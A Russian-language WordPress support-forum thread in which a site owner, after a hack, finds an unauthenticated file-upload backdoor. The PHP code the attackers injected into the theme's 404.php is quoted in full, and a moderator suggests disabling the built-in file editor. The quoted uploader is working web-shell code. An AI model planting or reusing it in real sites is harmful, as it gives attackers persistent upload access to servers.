Поддержка Проблемы и решения Защита wp от взлома

  • Добрый день !

    Заметил неприятную штуку , у меня на сайте есть доступ снаружи к файлу load.php , он даёт возможность загружать файлы в корневую папку. Вервия wp 4.0.

    Как это можно закрыть ?

Просмотр 8 ответов — с 1 по 8 (всего 8)
  • точнее имясайта.ru/wp-load даёт возможность из вне загружать файлы в корневую папку.

    Модератор Sergey Biryukov

    (@sergeybiryukov)

    Live and Learn

    wp-load даёт возможность из вне загружать файлы в корневую папку.

    Каким образом? Штатный файл wp-load.php подключает файлы самого WordPress и никак не связан с загрузкой файлов на сервер.

    В том то и дело 🙂 сам удивляюсь. Штатный файл wp-load.php дает пустую страницу, а запрос /wp-load даёт такую возможность. Сайт взломали вчера, я менял Url для доступа в админку и заметил такую вещь. 🙂 эта страница начала выводиться по запросу /wp-admin/

    Системные файлы вроде бы обновил, но проблема осталась.

    Так и не понял, как вы определили, что есть возможность через этот файл загружать файлы в корень. Пример можете написать ?

    У вас задан для сайта простой логин и пароль, такой как admin и 123456 и разрешено изменение php файлов через редактор WordPress?

    Нашел где это прописано. В файле 404.php прописали:

    <?php
    if(isset($_POST[‘Submit’])){
    $filedir = «»;
    $maxfile = ‘2000000’;
    $userfile_name = $_FILES[‘image’][‘name’];
    $userfile_tmp = $_FILES[‘image’][‘tmp_name’];
    if (isset($_FILES[‘image’][‘name’])) {
    $abod = $filedir.$userfile_name;
    @move_uploaded_file($userfile_tmp, $abod);
    echo»<center><b>Done ==></b>$userfile_name</center>»;
    }
    }

    else{
    echo’
    <form method=»POST» action=»» enctype=»multipart/form-data»><input type=»file» name=»image»><input type=»Submit» name=»Submit» value=»UPLOAD!»></form>’;}
    ?>

    У вас задан для сайта простой логин и пароль, такой как admin и 123456 и разрешено изменение php файлов через редактор WordPress?

    Логин менял пароль не сильно сложный но не стандартный набор букв и цифр. Последние разы, когда взламывали площадки меняли логин администратора на свой, пароль тоже скорее всего меняли.

    А вот редактирование файлов через админку открыто, подскажите, как это можно закрыть ?

    В wp-config.php прописать
    define( 'DISALLOW_FILE_EDIT', true );

Просмотр 8 ответов — с 1 по 8 (всего 8)
  • Тема «Защита wp от взлома» закрыта для новых ответов.